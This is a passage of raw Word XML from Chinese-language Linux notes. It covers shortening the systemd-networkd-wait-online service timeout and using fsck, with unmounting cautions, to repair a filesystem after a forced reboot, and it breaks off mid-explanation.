        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>drwxr-xr-x  2 root root 4096 Aug 24  2021 ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0EA1AD" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>drwxr-xr-x 19 root root 4096 Mar 24 08:11 ../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D73A5" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lrwxrwxrwx  1 root root   56 Aug 16  2021 systemd-networkd-wait-online.service -&gt; /lib/systemd/system/systemd-networkd-wait-online.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24574F1A" w14:textId="22BAC301" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D7D4A7" w14:textId="27C13EC8" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9239DA" w14:textId="7679145D" w:rsidR="00D86824" w:rsidRDefault="004C0583" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C0583">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在【</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0583">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0583">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】代码快最末尾加上</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0583">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TimeoutStartSec=2sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FD86C" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5892CCC8" w14:textId="63511EE4" w:rsidR="00663A46" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B77515B" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  SPDX-License-Identifier: LGPL-2.1+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B790301" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74F9FB" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  This file is part of systemd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6EA01" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BD758" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  systemd is free software; you can redistribute it and/or modify it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831208A" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  under the terms of the GNU Lesser General Public License as published by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA123D" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  the Free Software Foundation; either version 2.1 of the License, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205AB2A3" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  (at your option) any later version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283D016" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D2B0AA" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED026FA" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Description=Wait for Network to be Configured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327407A8" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Documentation=man:systemd-networkd-wait-online.service(8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285692C5" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>DefaultDependencies=no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C496822" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Conflicts=shutdown.target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CAEA7" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Requires=systemd-networkd.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18350F64" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>After=systemd-networkd.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C372F" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Before=network-online.target shutdown.target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDE754" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A078E1" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[Service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A10DB" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Type=oneshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33754F1E" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ExecStart=/lib/systemd/systemd-networkd-wait-online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668F629" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>RemainAfterExit=yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B84893" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="004C0583" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0583">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>TimeoutStartSec=2sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC52CC1" w14:textId="77777777" w:rsidR="00D86824" w:rsidRPr="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[Install]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52E3F8" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D86824">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>WantedBy=network-online.target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1AFD1A" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750E8BED" w14:textId="4A1AFA4F" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0801823E" w14:textId="3CEE3A53" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4045AA" w14:textId="2EBD577C" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D209E3" w14:textId="04D21B24" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B67E71C" w14:textId="77777777" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE811C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="_Toc159779738"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fsck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：强行重启系统导致分区出现问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w14:paraId="3DFDF295" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://c.biancheng.net/view/887.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525003F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.linuxprobe.com/linux-fsck-command.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B47D48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://cloud.tencent.com/developer/article/1721746</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41372499" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B83DB91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fsck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复的问题，主要是磁盘无法启动、由于强制断电等造成文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误、磁盘内容错误一类的（解决的是修复磁盘的问题）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B4FA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577B6473" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>常见的5种损坏类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9851E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>未被引用的</w:t>
      </w:r>
      <w:r>
        <w:t>inode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504949B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:t>难以置信的超大链接数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5EDCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:t>没有记录在磁盘块映射表中的未用数据快</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340B619" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:t>列出的空闲数据快还在某个文件中便用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496DB1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:t>超级块中不正确的汇总信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60AEF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A24315D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> fsck </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>命令修改某文件系统时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这个文件系统对应的磁盘分区一定要处于卸载状态，磁盘分区在挂载状态下进行修复是非常不安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据可能会遭到破坏，也有可能会损坏磁盘。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79868024" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EEF098" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见做法，是对格式化的磁盘进行修复。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意不能修复已挂载的磁盘,否则会导致永久性损伤磁盘。需要先umount磁盘，在fsck进行修复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490D973" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F2EFA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fsck -r /dev/sdb1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E01868" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65151F9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情景：我虚拟机卡死的情况下无奈重启电脑，重新打开虚拟机后，发现屏幕上报错如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A3E45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6914F144" wp14:editId="6378B7C2">
            <wp:extent cx="3804920" cy="2621280"/>
            <wp:effectExtent l="0" t="0" r="5080" b="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83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3804920" cy="2621280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3C969" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我虚拟机的磁盘使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行分配，然后由于上述原因出问题了。可以看到某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Inode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了问题（给出了逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和物理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置），然后虚拟机自行进入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令中，要求手动进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B2B42A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB65BC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里因为磁盘有问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
